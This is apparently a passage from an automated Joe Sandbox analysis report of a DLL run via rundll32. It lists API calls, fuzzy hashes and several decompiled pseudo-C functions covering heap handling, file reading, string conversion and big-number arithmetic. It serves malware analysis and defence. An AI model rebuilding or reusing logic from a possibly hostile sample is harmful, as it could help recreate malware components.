                  • Associated: 00000005.00000002.310913777.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: CriticalSection$EnterLeave$AllocHeapmemset
                  • String ID:
                  • API String ID: 3215818008-0
                  • Opcode ID: a5b05b0876b64fc44e85eded25e425ee8759b37968ca7e229990649024b80293
                  • Instruction ID: 1a3dd1e818266afc597f0a591a41220640f3dae03b5c6049ded73bf0a5c13329
                  • Opcode Fuzzy Hash: a5b05b0876b64fc44e85eded25e425ee8759b37968ca7e229990649024b80293
                  • Instruction Fuzzy Hash: F731A9B2A00B4896DB81CF5AE84878D77A0F748BD4F858026EF4D93360DF34CA9AC740
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • lstrlenA.KERNEL32(?,?,?,?,00000001,00000001800058DA,?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 000000018000269E
                  • HeapAlloc.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 00000001800026B0
                  • lstrcpyA.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 00000001800026DB
                  • CloseHandle.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 0000000180002724
                  • GetLastError.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 000000018000272C
                  • HeapFree.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 0000000180002741
                  Memory Dump Source
                  • Source File: 00000005.00000002.310871508.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.310865935.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310900783.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310913777.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: Heap$AllocCloseErrorFreeHandleLastlstrcpylstrlen
                  • String ID:
                  • API String ID: 2779700050-0
                  • Opcode ID: 865beac6f0010f69ec7a2bfeae32a674284dc580b90d05da419d0201c0ed98bc
                  • Instruction ID: 8ed8152a395896e124fdee7dd42a1db6533dceb9cab86c829ebc78b2e775e80d
                  • Opcode Fuzzy Hash: 865beac6f0010f69ec7a2bfeae32a674284dc580b90d05da419d0201c0ed98bc
                  • Instruction Fuzzy Hash: 8221AD36604788C6E7A6DF52B84039AB7A0B78CBE0F48C425FE9A47764CF38D649C700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 39%
                  			E00000001180003698(void* __eflags, long long __rbx, void* __rcx, long long __rdx, long long __rbp, void* __r8, void* __r9, void* _a8, void* _a16, short _a32) {
                  				void* _v32;
                  				short _v38;
                  				short _v40;
                  				long long _v48;
                  				signed short _v54;
                  				signed short _v56;
                  				void* __rsi;
                  				void* _t20;
                  				void* _t24;
                  				short _t30;
                  				signed short _t32;
                  				long long _t44;
                  				long _t56;
                  				long _t59;
                  				void* _t60;
                  				long long _t63;
                  				void* _t65;
                  				void* _t75;
                  				void* _t76;
                  
                  				_t45 = __rbx;
                  				_t75 = _t65;
                  				 *((long long*)(_t75 + 8)) = __rbx;
                  				 *((long long*)(_t75 + 0x10)) = __rbp;
                  				_t44 =  *0x8000d4a0;
                  				_t60 = __r8;
                  				_t63 = __rdx;
                  				_t20 = E00000001180001000(__rbx, _t75 - 0x20, __rdx, _t75 + 0x20);
                  				r12d = 0;
                  				if (_t20 != r12d) goto 0x8000376a;
                  				_t30 = _a32;
                  				_v38 = _t30;
                  				_v40 = _t30;
                  				_t32 = _t30 + 1 + _t30 + 1;
                  				_v54 = _t32;
                  				r8d = _t32 & 0x0000ffff;
                  				HeapAlloc(_t76, _t56, _t59);
                  				_v48 = _t44;
                  				if (_t44 == _t76) goto 0x8000375a;
                  				r8d = 0;
                  				_v56 = r12w;
                  				if (RtlOemStringToUnicodeString(??, ??, ??) - r12d >= 0) goto 0x80003731;
                  				RtlNtStatusToDosError(??);
                  				goto 0x80003748;
                  				_t24 = E00000001180005A0C((_v56 & 0x0000ffff) >> 1, _t45, _v48, _t60, _t63, _t63, _t60);
                  				HeapFree(??, ??, ??);
                  				HeapFree(??, ??, ??);
                  				return _t24;
                  			}






















                  0x180003698
                  0x180003698
                  0x18000369b
                  0x18000369f
                  0x1800036ab
                  0x1800036b2
                  0x1800036b5
                  0x1800036c4
                  0x1800036c9
                  0x1800036d1
                  0x1800036d7
                  0x1800036dd
                  0x1800036e2
                  0x1800036ea
                  0x1800036ed
                  0x1800036f2
                  0x1800036f9
                  0x1800036ff
                  0x180003707
                  0x180003713
                  0x180003716
                  0x180003725
                  0x180003729
                  0x18000372f
                  0x180003743
                  0x180003754
                  0x180003764
                  0x18000377e

                  APIs
                    • Part of subcall function 0000000180001000: CreateFileW.KERNEL32 ref: 000000018000104A
                    • Part of subcall function 0000000180001000: GetFileSize.KERNEL32 ref: 000000018000105E
                    • Part of subcall function 0000000180001000: CloseHandle.KERNEL32 ref: 00000001800010D9
                    • Part of subcall function 0000000180001000: HeapFree.KERNEL32 ref: 00000001800010F0
                  • HeapAlloc.KERNEL32(?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 00000001800036F9
                  • RtlOemStringToUnicodeString.NTDLL ref: 000000018000371C
                  • RtlNtStatusToDosError.NTDLL ref: 0000000180003729
                  • HeapFree.KERNEL32(?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 0000000180003754
                  • HeapFree.KERNEL32(?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 0000000180003764
                  Memory Dump Source
                  • Source File: 00000005.00000002.310871508.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.310865935.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310900783.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310913777.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: Heap$Free$FileString$AllocCloseCreateErrorHandleSizeStatusUnicode
                  • String ID:
                  • API String ID: 45859668-0
                  • Opcode ID: 9076e75a246ab2846ebd8e8eb0ec80191478d5bcc226e42bb9bdcc49be13810a
                  • Instruction ID: f5e01ebc0847fc45ed597bc040b189ed2f2401146e9d5498dfbecc36209ca11f
                  • Opcode Fuzzy Hash: 9076e75a246ab2846ebd8e8eb0ec80191478d5bcc226e42bb9bdcc49be13810a
                  • Instruction Fuzzy Hash: 6D217172218B5881E6A1DB26E44579E73A1FB8CBD4F549521FA8E83768DF38C649CB00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 60%
                  			E000000011800033B4(void* __eflags, long long __rbx, long long __rcx, long long __rdx, void* __r8, signed int __r9) {
                  				void* __rdi;
                  				intOrPtr _t65;
                  				intOrPtr _t87;
                  				intOrPtr _t100;
                  				intOrPtr _t101;
                  				intOrPtr _t105;
                  				signed long long _t107;
                  				void* _t112;
                  				void* _t120;
                  				signed long long _t123;
                  				signed long long _t130;
                  				intOrPtr* _t131;
                  				intOrPtr _t139;
                  				void* _t154;
                  				intOrPtr _t155;
                  				void* _t157;
                  				signed long long _t159;
                  				intOrPtr* _t160;
                  				void* _t163;
                  				void* _t165;
                  				void* _t166;
                  				intOrPtr* _t171;
                  				void* _t179;
                  				signed long long _t181;
                  				signed long long _t182;
                  				int _t185;
                  				int _t187;
                  				void* _t191;
                  
                  				 *((long long*)(_t165 + 0x18)) = __rbx;
                  				 *((long long*)(_t165 + 0x10)) = __rdx;
                  				 *((long long*)(_t165 + 8)) = __rcx;
                  				_t166 = _t165 - 0x660;
                  				_t155 =  *((intOrPtr*)(_t166 + 0x6c0));
                  				r13d = r9d;
                  				r9d =  *((intOrPtr*)(_t166 + 0x6c8));
                  				r9d = r9d - 1;
                  				_t123 = r9d - 1;
                  				if (__eflags < 0) goto 0x80003400;
                  				if ( *((intOrPtr*)(_t155 + _t123 * 4)) == 0) goto 0x800033f1;
                  				_t105 = __r9 + 1;
                  				 *((intOrPtr*)(_t166 + 0x28)) = _t105;
                  				if (_t105 == 0) goto 0x80003641;
                  				_t13 = _t123 + 0x20; // 0x20
                  				r14d = _t13;
                  				if ( *((intOrPtr*)(_t155 + _t123 * 4)) == 0) goto 0x8000342d;
                  				_t112 = 0 - r14d;
                  				if (_t112 >= 0) goto 0x8000342d;
                  				if (_t112 != 0) goto 0x80003422;
                  				r14d = r14d - 1;
                  				r8d = _t105;
                  				 *((intOrPtr*)(_t166 + 0x20)) = r14d;
                  				memset(_t191, _t187, _t185);
                  				_t16 = _t166 + 0x250; // 0x249
                  				r9d = r13d;
                  				r8d = r14d;
                  				_t130 = _t185 << 2;
                  				_t65 = E00000001180008AD0(_t112, _t130, _t16, __r8, _t155, _t179);
                  				_t17 = _t166 + 0x40; // 0x39
                  				r9d = _t105;
                  				 *((intOrPtr*)(_t166 + _t130 + 0x250)) = _t65;
                  				E00000001180008AD0(_t112, _t130, _t17, _t155, _t155, _t154);
                  				_t100 =  *((intOrPtr*)(_t166 + 0x40 + _t159 * 4));
                  				 *((intOrPtr*)(_t166 + 0x24)) = _t100;
                  				memset(_t163, ??);
                  				r13d = r13d - _t105;
                  				_t139 = _t105;
                  				_t181 = r13d;
                  				 *(_t166 + 0x30) = _t181;
                  				if (_t112 < 0) goto 0x800035ee;
                  				_t124 = _t181 + _t139;
                  				_t28 = _t181 * 4; // 0x249
                  				_t160 = _t166 + _t28 + 0x250;
                  				r9d = 0xffffffff;
                  				_t31 = _t124 * 4; // 0x249
                  				_t131 = _t166 + _t31 + 0x250;
                  				if (_t100 != r9d) goto 0x800034d0;
                  				_t101 =  *_t131;
                  				goto 0x800034fb;
                  				r8d = _t155 + 1;
                  				_t157 =  >  ? __r9 : (_t181 + _t139 << 0x20) + _t139 + _t181;
                  				_t44 = _t166 + 0x40; // 0x39
                  				_t171 = _t160;
                  				r10d = _t105;
                  				if (_t101 == 0) goto 0x8000357a;
                  				r12d = 0xffffffff;
                  				r9d =  *_t44;
                  				_t87 =  *_t160;
                  				r10d = r10d + r12d;
                  				_t176 = __r9 * _t163;
                  				 *_t171 = _t87;
                  				if (_t87 - r12d <= 0) goto 0x80003548;
                  				goto 0x8000354a;
                  				 *_t171 =  *_t171 - r9d;
                  				if ( *_t171 - r12d - r9d <= 0) goto 0x80003565;
                  				goto 0x80003567;
                  				if (r10d != 0) goto 0x80003517;
                  				_t107 =  *((intOrPtr*)(_t166 + 0x28));
                  				_t182 =  *(_t166 + 0x30);
                  				 *_t131 =  *_t131 - 0 + 0 + r11d;
                  				if ( *_t131 != 0) goto 0x80003595;
                  				_t47 = _t166 + 0x40; // 0x39
                  				r8d = _t107;
                  				_t120 = E000000011800049DC(_t160, _t47, _t171 + 4);
                  				if (_t120 < 0) goto 0x800035ae;
                  				_t48 = _t166 + 0x40; // 0x39
                  				r9d = _t107;
                  				 *_t131 =  *_t131 - E00000001180004D74(_t77,  *_t171, _t131, _t160, _t160, _t48);
                  				goto 0x8000357c;
                  				 *((intOrPtr*)( *((intOrPtr*)(_t166 + 0x6a0)) + _t182 * 4)) = _t101 + 1;
                  				r13d = r13d - 1;
                  				 *(_t166 + 0x30) = _t182 - 1;
                  				r9d = 0xffffffff;
                  				if (_t120 >= 0) goto 0x800034c7;
                  				r14d =  *((intOrPtr*)(_t166 + 0x20));
                  				r8d =  *((intOrPtr*)(_t166 + 0x6c8));
                  				memset(??, ??, ??);
                  				_t57 = _t166 + 0x250; // 0x249
                  				r9d = _t107;
                  				r8d = r14d;
                  				E00000001180007220(_t120, _t131 - 4,  *((intOrPtr*)(_t166 + 0x6a8)), _t57, _t157, _t176, _t159);
                  				r8d = 0x40c;
                  				memset(??, ??, ??);
                  				r8d = 0x204;
                  				return memset(??, ??, ??);
                  			}































                  0x1800033b4
                  0x1800033b9
                  0x1800033be
                  0x1800033ce
                  0x1800033d5
                  0x1800033dd
                  0x1800033e0
                  0x1800033f1
                  0x1800033f4
                  0x1800033f8
                  0x1800033fe
                  0x180003400
                  0x180003404
                  0x18000340a
                  0x18000341a
                  0x18000341a
                  0x180003420
                  0x180003422
                  0x180003425
                  0x18000342b
                  0x18000342d
                  0x180003430
                  0x180003441
                  0x180003446
                  0x18000344b
                  0x180003456
                  0x180003459
                  0x18000345f
                  0x180003463
                  0x180003468
                  0x18000346d
                  0x180003473
                  0x18000347a
                  0x18000347f
                  0x180003490
                  0x180003494
                  0x180003499
                  0x18000349c
                  0x18000349f
                  0x1800034a2
                  0x1800034a7
                  0x1800034ad
                  0x1800034b1
                  0x1800034b1
                  0x1800034b9
                  0x1800034bf
                  0x1800034bf
                  0x1800034ca
                  0x1800034cc
                  0x1800034ce
                  0x1800034d3
                  0x1800034f7
                  0x1800034fd
                  0x180003505
                  0x180003508
                  0x18000350d
                  0x180003511
                  0x18000351a
                  0x180003520
                  0x180003524
                  0x180003527
                  0x18000353a
                  0x18000353f
                  0x180003546
                  0x18000354a
                  0x18000355c
                  0x180003563
                  0x18000356f
                  0x180003571
                  0x180003575
                  0x18000357a
                  0x18000357f
                  0x180003581
                  0x180003586
                  0x180003591
                  0x180003593
                  0x180003595
                  0x18000359a
                  0x1800035aa
                  0x1800035ac
                  0x1800035be
                  0x1800035c9
                  0x1800035cd
                  0x1800035d5
                  0x1800035db
                  0x1800035e1
                  0x1800035ee
                  0x1800035ff
                  0x180003604
                  0x18000360c
                  0x18000360f
                  0x180003615
                  0x180003624
                  0x18000362a
                  0x180003636
                  0x18000365b

                  APIs
                  Memory Dump Source
                  • Source File: 00000005.00000002.310871508.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.310865935.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310900783.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310913777.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: memset
                  • String ID:
                  • API String ID: 2221118986-0
                  • Opcode ID: a76d0726cef9ae4b561de819fedaba575e74fa77d35c7135b84bcd3433ab4b61
                  • Instruction ID: ec3f035d16c0e924505bfe3f3cda61bac28d8e6f0fc5c54ff73492b97cc3beba
                  • Opcode Fuzzy Hash: a76d0726cef9ae4b561de819fedaba575e74fa77d35c7135b84bcd3433ab4b61
                  • Instruction Fuzzy Hash: EE61F532704A8486E772CE27E8457DABB95F3D8BC8F448125EE4953B98DF39E605CB00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000005.00000002.310871508.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.310865935.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310900783.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310913777.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: memcmp$FreeHeap
                  • String ID:
                  • API String ID: 1680564963-0
                  • Opcode ID: ebefc488027962227a33868cb32fed72d0b4f2502500ec4154850c2412e11902
                  • Instruction ID: e13f11c4693d54ee7f56904197b6c81cc0d09359d032e1af4ae6464abc78b12e
                  • Opcode Fuzzy Hash: ebefc488027962227a33868cb32fed72d0b4f2502500ec4154850c2412e11902
                  • Instruction Fuzzy Hash: 4551A172B0878955EBA2CB15A4843DA77A1A7AD7C4F54C025EE8C43786EE3DC64DC701
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 37%
                  			E00000001180001EEC(void* __edi, void* __eflags, long long __rbx, long long __rcx, void* __rdx, void* __r8) {
                  				void* __rsi;
                  				signed int _t65;
                  				unsigned int _t66;
                  				signed int _t73;
                  				void* _t78;
                  				unsigned int _t85;
                  				void* _t87;
                  				void* _t91;
                  				void* _t112;
                  				int _t116;
                  				long long _t122;
                  				void* _t125;
                  				void* _t126;
                  				int _t143;
                  				void* _t145;
                  				void* _t148;
                  
                  				_t78 = __eflags;
                  				_t87 = _t125;
                  				 *((long long*)(_t87 + 0x10)) = __rbx;
                  				 *((long long*)(_t87 + 0x18)) = _t122;
                  				 *((long long*)(_t87 + 8)) = __rcx;
                  				_t126 = _t125 - 0x860;
                  				r14d =  *((intOrPtr*)(_t126 + 0x8b8));
                  				_t91 = __rdx;
                  				 *(_t126 + 0x30) = _t148 << 2;
                  				memcpy(_t148, _t145, _t143);
                  				_t9 = _t126 + 0x454; // 0x4a5
                  				 *((intOrPtr*)(_t126 + 0x20)) = r14d;
                  				E00000001180003934(__rdx, _t9, _t148 << 2,  *((intOrPtr*)(_t126 + 0x8b0)));
                  				_t13 = _t126 + 0x658; // 0x6a9
                  				 *((intOrPtr*)(_t126 + 0x20)) = r14d;
                  				E00000001180003934(_t91, _t13, _t148 << 2,  *((intOrPtr*)(_t126 + 0x8b0)));
                  				memset(_t112, _t116);
                  				 *((intOrPtr*)(_t126 + 0x40)) = 1;
                  				_t73 = __edi - 1;
                  				if (_t78 < 0) goto 0x80001faa;
                  				if ( *((intOrPtr*)(__r8 + (r9d - 1) * 4)) == 0) goto 0x80001f9a;
                  				r12d = _t73;
                  				if (_t73 < 0) goto 0x80002081;
                  				_t65 =  *(__r8 + _t73 * 4);
                  				if (_t73 != r12d) goto 0x80001fe8;
                  				if ((_t65 & 0xc0000000) != 0) goto 0x80001fe8;
                  				_t66 = _t65 << 2;
                  				if ((_t66 & 0xc0000000) == 0) goto 0x80001fd2;
                  				if (0x10000001e == 0) goto 0x80002075;
                  				 *((intOrPtr*)(_t126 + 0x20)) = r14d;
                  				E00000001180003934(_t91, _t126 + 0x40, _t73,  *((intOrPtr*)(_t126 + 0x8b0)));
                  				 *((intOrPtr*)(_t126 + 0x20)) = r14d;
                  				E00000001180003934(_t91, _t126 + 0x40, _t73,  *((intOrPtr*)(_t126 + 0x8b0)));
                  				_t85 = _t66 >> 0x1e;
                  				if (_t85 == 0) goto 0x80002068;
                  				 *((intOrPtr*)(_t126 + 0x20)) = r14d;
                  				E00000001180003934(_t91, _t126 + 0x40, _t73,  *((intOrPtr*)(_t126 + 0x8b0)));
                  				if (_t85 != 0) goto 0x80001fef;
                  				if (_t85 >= 0) goto 0x80001fbb;
                  				memcpy(??, ??, ??);
                  				r8d = 0x60c;
                  				memset(??, ??, ??);
                  				r8d = 0x204;
                  				return memset(??, ??, ??);
                  			}



















                  0x180001eec
                  0x180001eec
                  0x180001eef
                  0x180001ef3
                  0x180001ef7
                  0x180001f03
                  0x180001f0a
                  0x180001f22
                  0x180001f2c
                  0x180001f31
                  0x180001f46
                  0x180001f51
                  0x180001f56
                  0x180001f6b
                  0x180001f76
                  0x180001f7b
                  0x180001f8a
                  0x180001f8f
                  0x180001f9a
                  0x180001fa0
                  0x180001fa8
                  0x180001faa
                  0x180001fb5
                  0x180001fbb
                  0x180001fc8
                  0x180001fd0
                  0x180001fd2
                  0x180001fde
                  0x180001fe2
                  0x180002006
                  0x18000200b
                  0x180002027
                  0x18000202c
                  0x180002036
                  0x180002038
                  0x18000205e
                  0x180002063
                  0x18000206f
                  0x18000207b
                  0x180002093
                  0x1800020a2
                  0x1800020a8
                  0x1800020b4
                  0x1800020da

                  APIs
                  Memory Dump Source
                  • Source File: 00000005.00000002.310871508.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.310865935.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310900783.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310913777.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: memset$memcpy
                  • String ID:
                  • API String ID: 368790112-0
                  • Opcode ID: 9069574d71fd3576152aa11697abaa86dc79558948906a610bfcadaab4521cb1
                  • Instruction ID: c336bcc7fd0d3219ccdcc3e7649660a569ab46c29ccafd654ab2136e7df858a2
                  • Opcode Fuzzy Hash: 9069574d71fd3576152aa11697abaa86dc79558948906a610bfcadaab4521cb1
                  • Instruction Fuzzy Hash: ED416272204BCA95EB61DA12E4443EAB364F7D9BC4F418111FF8857B89DF39C60ACB40
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 34%
                  			E00000001180006108(signed int __rbx, long long __rcx, void* __rdx, void* __r8, char _a8, long long _a16, intOrPtr _a24, intOrPtr _a48, intOrPtr _a56, long long _a64) {
                  				long long _v72;
                  				long long _v88;
                  				void* __rsi;
                  				void* __rbp;
                  				intOrPtr _t40;
                  				void* _t56;
                  				void* _t57;
                  				intOrPtr _t67;
                  				intOrPtr _t69;
                  				intOrPtr* _t73;
                  				signed long long _t90;
                  				void* _t92;
                  				void* _t108;
                  				void* _t110;
                  				intOrPtr* _t112;
                  
                  				_t72 = __rbx;
                  				_a16 = __rbx;
                  				_a8 = __rcx;
                  				_t69 =  *0x8000d4a0;
                  				_t57 = r8d;
                  				_v72 =  *((intOrPtr*)(_t69 + 8));
                  				_t8 = _t90 + 8; // 0x8
                  				r14d = _t8;
                  				HeapAlloc(??, ??, ??);
                  				if (_t69 == 0) goto 0x8000627d;
                  				if (_t57 == 0) goto 0x800061f7;
                  				_t112 = __rdx + 0x20;
                  				E00000001180006008(__rbx, __rcx, _t92, __rdx + (__rbx + __rbx * 4) * 8);
                  				if (_t69 == 0) goto 0x800061ec;
                  				r9d =  *((intOrPtr*)(_t112 - 8));
                  				_v88 = _t69 + (_t90 + _t90 * 2) * 8;
                  				_a24 = E00000001180006344(_t69, _t72, _a8, _t69, _t92,  *_t112, _t108, _t110);
                  				HeapFree(??, ??, ??);
                  				_t40 = _a24;
                  				if (_t40 == 0) goto 0x800061ec;
                  				_t56 = 0 + _t40;
                  				if (1 - _t57 < 0) goto 0x80006176;
                  				r14d = 8;
                  				if (1 != _t57) goto 0x80006225;
                  				_v88 = _a64;
                  				r14d = E00000001180007444(_t40, _t56, _t72, _t69, _a48, _a56);
                  				if (_t56 == 0) goto 0x8000626f;
                  				_t31 =  &_a8; // 0x8
                  				_t73 = _t31;
                  				if ( *_t73 == 0) goto 0x8000624b;
                  				HeapFree(??, ??, ??);
                  				if ( *((intOrPtr*)(_t73 - 8)) == 0) goto 0x80006265;
                  				_t67 =  *((intOrPtr*)(_t73 + 0xc));
                  				if (_t67 == 0) goto 0x80006265;
                  				HeapFree(??, ??, ??);
                  				if (_t67 != 0) goto 0x80006238;
                  				HeapFree(??, ??, ??);
                  				return r14d;
                  			}


















                  0x180006108
                  0x180006108
                  0x18000610d
                  0x180006121
                  0x180006128
                  0x180006148
                  0x18000614d
                  0x18000614d
                  0x180006151
                  0x18000615d
                  0x180006167
                  0x180006172
                  0x180006184
                  0x18000618f
                  0x180006191
                  0x1800061ae
                  0x1800061c0
                  0x1800061c7
                  0x1800061cd
                  0x1800061d6
                  0x1800061e2
                  0x1800061ea
                  0x1800061f1
                  0x1800061f9
                  0x180006218
                  0x180006222
                  0x180006232
                  0x180006234
                  0x180006234
                  0x18000623e
                  0x180006245
                  0x180006252
                  0x180006254
                  0x180006258
                  0x18000625f
                  0x18000626d
                  0x180006277
                  0x180006297

                  APIs
                  Memory Dump Source
                  • Source File: 00000005.00000002.310871508.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.310865935.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310900783.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310913777.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: Heap$AllocFreelstrlen$Timelstrcatlstrcpy$FileSleepSystem_snprintf
                  • String ID:
                  • API String ID: 2523292596-0
                  • Opcode ID: 32a0b26bd92ab6956d2394037830c20eeece6c9e21b54aa9face044d742a5a88
                  • Instruction ID: d6b07597f5ec485a57081f9d46160005d1067fb2ae4cc7d855a507384812b52f
                  • Opcode Fuzzy Hash: 32a0b26bd92ab6956d2394037830c20eeece6c9e21b54aa9face044d742a5a88
                  • Instruction Fuzzy Hash: E1415E32604B8892EBA2CF56E8447DA77A1F788BC4F48C016EE5D93765DF38C649C700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 60%
                  			E00000001180007DBC(void* __edx, void* __eflags, void* __rcx, long long __rdx, long long __r8, signed int _a8, long long* _a16, signed int* _a24, signed int _a32) {
                  				intOrPtr _v80;
                  				void* _v88;
                  				long _v96;
                  				signed int _v104;
                  				long long _v112;
                  				long long _v120;
                  				void* __rbx;
                  				void* __rsi;
                  				void* __rbp;
                  				signed int _t55;
                  				signed int _t63;
                  				void* _t64;
                  				void* _t71;
                  				void* _t73;
                  				signed int _t74;
                  				void* _t75;
                  				void* _t76;
                  				void* _t85;
                  				signed long long _t107;
                  				struct _FILETIME* _t110;
                  				void* _t128;
                  				void* _t129;
                  				long _t131;
                  				signed int _t132;
                  				void* _t135;
                  				void* _t137;
                  				void* _t147;
                  				void* _t148;
                  				void* _t149;
                  				signed int* _t150;
                  				long long _t151;
                  				void* _t153;
                  				signed long long _t155;
                  				void* _t157;
                  
                  				_t148 = _t137;
                  				 *((long long*)(_t148 + 0x18)) = __r8;
                  				 *((long long*)(_t148 + 0x10)) = __rdx;
                  				 *(_t148 + 0x20) =  *(_t148 + 0x20) & 0x00000000;
                  				r14d = 0;
                  				_v104 =  *0x8000d498;
                  				_t129 = __rcx;
                  				 *(_t148 - 0x58) =  *(_t148 - 0x58) & _t155;
                  				if (E00000001180001CB0(_t110, __rcx, _t148 - 0x60, _t135, _t148 + 8, _t157, _t155) == 0) goto 0x80007e19;
                  				_t11 = _t155 + 1; // 0x1
                  				r12d = _t11;
                  				_v96 = _t131;
                  				goto 0x80007e24;
                  				_t132 = _v96;
                  				r12d = 2;
                  				_t14 =  &_a32; // 0xba
                  				_t15 =  &_v88; // 0x42
                  				if (E00000001180008034(_t71, r12d, _t85, _t110, _t129, _t132, _t135, _t15, _t14, _t153, _t149) != 0) goto 0x80007fff;
                  				r8d = _a32;
                  				r13d = r8d;
                  				r13d = r13d - r12d;
                  				_t150 = _v88;
                  				if (_t132 == 0) goto 0x80007e7d;
                  				_t55 = _a8;
                  				_t150[0xa] = 1;
                  				_t150[0x12] = _t132;
                  				_t150[0xd] = _t55;
                  				_t150[0x10] = _t55;
                  				_t24 = _t129 + 0xb0; // 0xb0
                  				r9d = 0;
                  				 *_t150 = _v104 ^ 0x62ade362;
                  				_t150[3] =  *(_t129 + 0x48);
                  				_t150[2] =  *(_t129 + 0x4c);
                  				_t29 =  &_a8; // 0xa2
                  				_v112 = _t29;
                  				_t31 =  &_v104; // 0x32
                  				_v120 = _t31;
                  				_t73 = E0000000118000970C(_t54, _t110, _t24, _t150, _t132, _t15, _t14, _t148);
                  				HeapFree(_t128, _t131, _t135);
                  				if (r13d == 0) goto 0x80007eef;
                  				if (_t73 == 0) goto 0x80007ee4;
                  				if (_t73 != 0x10d2) goto 0x80007eef;
                  				E000000011800023B8(r13d, _t110, _t129, _t132, _t135);
                  				if (_t73 != 0) goto 0x80007fff;
                  				_t74 = _a8;
                  				_t151 = _v104;
                  				r13d =  *(_t129 + 0x4c);
                  				_t63 = E00000001180008C48(_t74, _t151);
                  				_t36 =  &_a8; // 0xa2
                  				r9d = 1;
                  				 *(_t129 + 0x48) = _t74;
                  				 *(_t129 + 0x4c) = _t63;
                  				_t64 = E000000011800099F4(_t76, _t110, _t129, _t151, _t132, _t135, _t36, _t147, _t148);
                  				_t75 = _t64;
                  				if (_t64 != 0) goto 0x80007fef;
                  				 *_a16 = _t151;
                  				 *_a24 = _a8;
                  				if ( *(_t129 + 0x4c) != r13d) goto 0x80007f62;
                  				r14d = 1;
                  				if ( *((intOrPtr*)(_t129 + 0x60)) == 0) goto 0x80007fb5;
                  				GetSystemTimeAsFileTime(_t110);
                  				if (r14d == 0) goto 0x80007fa2;
                  				_t107 =  *((intOrPtr*)(_t129 + 0x58));
                  				if (_v80 - _t107 <= 0) goto 0x80007fa2;
                  				_t47 = _t129 + 0xb0; // 0xb0
                  				if (E000000011800045E8(_t75, _t107, _t110, _t47, _t132, _t135) != 0) goto 0x80007fa2;
                  				asm("lock or dword [edi+0xdc], 0x1");
                  				 *((long long*)(_t129 + 0x58)) = _t107 * 0x23c34600 + _v80;
                  				if (_v96 == 0) goto 0x80007fdc;
                  				HeapFree(??, ??, ??);
                  				if (_t75 == 0) goto 0x80007fd4;
                  				if (_t75 != 0x10d2) goto 0x80007fdc;
                  				E00000001180008BC4(_t110, _t129, _v96);
                  				return _t75;
                  			}





































